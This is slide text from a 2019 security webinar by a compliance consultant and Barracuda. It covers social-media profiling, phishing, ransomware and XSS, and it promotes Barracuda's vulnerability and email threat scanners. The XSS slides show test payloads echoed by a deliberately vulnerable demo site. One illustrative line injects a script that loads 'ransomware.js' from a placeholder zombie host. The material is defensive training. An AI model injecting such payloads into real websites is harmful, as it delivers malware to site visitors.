“Latest Security Threat Research…and How To Protect Yourself”

11-19-2019

Agenda

• Sh

• Welcome and Introductions – Chris Riley- Shawn Duffy, Principal

Duffy Compliance Services • Email Phishing Attacks

• Web XSS Attacks

- Courtney Vick, Territory Manager - Barracuda

• Sh

Audio – In presentation mode until end

Control Panel

View webinar in full screen mode

Feel Free to submit written questions

Open Q & A at the end

(please raise your hand & we will unmute your

line)

Survey at conclusion of webinar

During the Webinar…

We Hope You are

Enjoying Your

Pizza!!

Please double check with your receptionist

then contact Mike Jones:

mjones@syssrc.com We will research and replace with an e-card

(We are recording the webinar – so don’t think twice about stepping away

for a few minutes to go pick it up at your front desk!)

System Source is a regional systems integratorWe have the people, processes and tools to help clients improve, maintain and acquire IT and Audio-Visual systems.

• We help IMPROVE IT operations. Clients ask us to train their staff for more productivity or rent our classrooms for private classes.

• We design PRESENTATION rooms including collaborative conference and classrooms.

• IMPROVING IT often requires top CONSULTANTS.

Shawn DuffyDuffy Compliance Services

Email

• Social Media profiling

• Phishing

• Ransomware

Social Media profiling

• What sites are you active on?• What are you sharing? (images, memes)• What are you chatting about?

• Are you looking for a job?• Are you looking for a relationship?• Your or someone’s health status

• Collect names of Pets & Family members • Vacation times and destinations• Passions (e.g., politics, religion)

Phishing

Ransomware

Cyber Extortion• Uses strong encryption• Payment via Bitcoin• Plenty of Variants

Web Application - XSS• Reflective:

• Non-Persistent XSS Technique

• Stored: • Persistent XSS

Technique

• DOM:• Client side

Technique

Barracuda Vulnerability Manager

https://bvm.barracudanetworks.com/login

https://www.../products/vulnerabilitymanager

Web Application – Walk thru• Vulnerable Test Site: http://public.blorpazort.com/

Web Application – Test Results• Barracuda Vulnerability Scan • Partial Results for #5

http://public.blorpazort.com/pages/xss_parsing_test.phpThe url parameter was submitted with the value "--><script>prompt(12345)</script>OCo9e<!--, and the string was echoed verbatim in the output.http://public.blorpazort.com/pages/page_header_inject.phpThe fname parameter was submitted with the value <script>prompt(12345)</script>v5Kh3, and the string was echoed verbatim in the output.http://public.blorpazort.com/pages/xss_form_post.phpThe search parameter was submitted with the value <script>prompt(12345)</script>nI45u, and the string was echoed verbatim in the output.

Web Application – Reflective XSSReview of http://public.blorpazort.com/pages/xss_form_post.php

<script>prompt(12345)</script>nI45u<img src='https://duffycompliance.com/images/DCS-logo.png' />

<script src=“http://<Zombie_IP/malware/ransomware.js”></script>

Web Application – Stored XSS• Review of http://public.blorpazort.com/pages/pager_header_inject.php

• https://google-gruyere.appspot.com/start

Web Application – Exploits

• System Security Assessments• Network, Wireless, and Web Application

• Security Control Evaluations

• Penetration Testing

• Privacy & Cybersecurity (CUI, HIPAA, FISMA, GDPR)• Compliance Frameworks (NIST, ISO, CSF, PF)

• Security Policy & Procedure Development

• Gap Analysis & Compliance Audits & DPIA

• Security Remediation Services

Courtney VickTerritory Manager - Barracuda

•BarracudaYour journey, secured

BR

AN

D -

Co

nte

nt

Fast stats…

Founded: 2003 Headquartered in

Silicon Valley

Offices in over

15 countries

Worldwide

employees:

1600+

Partners: 6500+

Customers:

150,000+ in over

100 countries

Revenue FY19:

USD 493 million

BR

AN

D -

Co

nte

nt Challenge Why it matters

Digital transformation

IT becoming differentiator in every function, every industry. Security

concerns almost everything you do. Cloud, SaaS is the new way to support

business innovation.

LOFT & FRAGTrained security resources are a HUGE limiting factor, especially given ever

more complex security landscape

Protecting data is priority #1Customer data ever more valuable, consequences of a breach never

greater

Evolving threat landscapeEnterprise perimeter has collapsed, attacks more targeted and

sophisticated. Email now THE place where most attacks start.

Customers tell us they face these challenges…

Security matters more than ever

Security is harder to manage than ever

Protecting your data is critical

Yesterday’s technology is no longer good enough

BR

AN

D -

Inte

rtitle

Free Vulnerability Scanner

BR

AN

D -

Co

nte

nt

What is an application?

Web App

Mobile App

API

BR

AN

D -

Co

nte

nt

How is an application secured?

Application

Servers

BR

AN

D -

Co

nte

nt

What percentage of apps are protected by WAFs?

Trivia

BR

AN

D -

Co

nte

nt

Today, fewer than 10%

And the answer is…

BR

AN

D -

Co

nte

nt

111

140

145

171

276

308

324

347

414

Payment Card Skimmers

Crimeware

Lost and Stolen Assets

Cyber-Espionage

Privilege Misuse

Everything Else

Point of Sale

Miscellaneous Errors

Web Applications

Frequency of Incidents

The #1 vector reported in business breaches

Web App Threats: the Top Emerging Vector

Percentage of vulnerabilities that

are web-based

80%Percentage of

cyberattacks that target web

applications

75%Number of malicious

ad impressionsper year

$12BNumber of websites defaced in the last

five years

$5M

Everyone is a Target

•Web exploitation kits available

• Easy to procure• No expertise required• They operate like companies• Can attack thousands of servers

in seconds

Barracuda Vulnerability Manager

Barracuda Vulnerability Manager

• Scan for web application vulnerabilities across entire website

•Granular capability

•Detailed vulnerability scan reports

• Integration with Barracuda Web Application Firewall

• Free service

Logging In

•Got to https://bnvlm.barracuda.com and log in with your Cloud Control credentials

Easy Identification and Remediation

Barracuda WAF Integration

• Import vulnerability report

Barracuda WAF Integration

• Remediate with a single click

Creating a Scan

• Enter a scan name and the URL you wish to scan

• Click ‘Start Scan’

Monitor a Scan

• Scans can take anywhere from 5 minutes to 48 hours depending on size and complexity of the site

• You can see the progress of your scan on the Active Scans tab

Viewing Reports

• View completed scans on the Finished Scans page

Viewing Reports• Click ‘Details’ next to a scan for a quick overview of the vulnerabilities

found during the scan

• Click ‘Copy’ to start another scan with the same configuration (you can change anything necessary before starting the new scan)

• Click ‘View’ to see the scan report in a browser

• Click ‘Download’ to download the scan report in one of three formats

BVM Reports

•We’ll review each component of a Barracuda Vulnerability Manager report:

BVM Reports: Vulnerabilities

• There are four severity levels for vulnerabilities:• Critical: These issues could allow hackers to cause catastrophic problems with

the web application, such as disabling it altogether, defacing it, or obtaining access to all of the site’s confidential data.

• High: These issues could allow hackers unauthorized access to certain pieces of data, or access to restricted parts of the site, under certain circumstances.

• Medium: These issues could allow hackers to perform phishing campaigns more easily, or defraud users of your application.

• Low: These issues can cause annoyances and may affect your SEO, but there is no significant risk.

BVM Reports: Vulnerabilities

• There are three confidence levels for vulnerabilities:• Certain: The scanner has confirmed that the vulnerability exists.• Likely: The scanner is reasonably certain that the vulnerability exists, but it

should be confirmed manually.• Possible: The scanner thinks the vulnerability may exist, but a manual check is

require to confirm.

BR

AN

D -

Co

nte

nt Verticals

• Finance / Retail (eCommerce) / Healthcare / Government

Have sensitive data to secure• Compliance: PCI, HIPAA, GDPR

• Online retail inventory or pricing information

Public cloud• The most deployed WAF in AWS and Azure

• Near-native integration with cloud platforms

Where we shine

BR

AN

D -

Inte

rtitle

Barracuda Email Threat Scanner

BR

AN

D -

Co

nte

nt

Targeted attacks start with email

74%

“Almost three quarters of all attacks start with email attachment or a link.”

2017 Threat Landscape Survey: Users on the Front Line - SANS Analyst Program

- SANS Analyst Program

BR

AN

D -

Co

nte

nt

Spam

and

malware

Attacks Increased complexity every yearR

isk

and

co

mp

lexi

ty

Time

SOX,

HIPAA,

FINRA

eDiscovery

Zero-day

attacksPhishing

Brand

erosion,

email trust

Ransom-

ware

Spear

phishing,

whaling,

BEC,

CEO fraud,

socially

engineered

phishing

Unified

mobile

inboxes and

unsecured

executive

personal

accounts

2000 2019

Account

takeover

(ATO)

BR

AN

D -

Co

nte

nt

The challenge

Personal

email

Spear

phishing

Mail server Corporate

inbox

EmployeesInternetATO

Spam

Firewall,

DLP,

Backup,

Archiving,

Sandboxing

Legitimate

dail

Zero day

BR

AN

D -

Co

nte

nt

Social engineering bypasses traditional approach

Most email security relies on volume / blacklisting• IP• Sender• Link• Domain• Text

Attackers have developed counter-measures• Zero-day links• Malicious pages hosted on legitimate domains• Targeted campaigns• ATO emails seem “trusted”

BR

AN

D -

Co

nte

nt

Email Threat Scanner

https://www.barracuda.com/email_scan

BR

AN

D -

Co

nte

nt One time pass of your O365 instance

Identifies current threats already within the employee inbox

Produce a report to visualise the business risk

Support build of business case & further discussions

Email Threat Scanner benefits

• Sh

Thank you for attending today!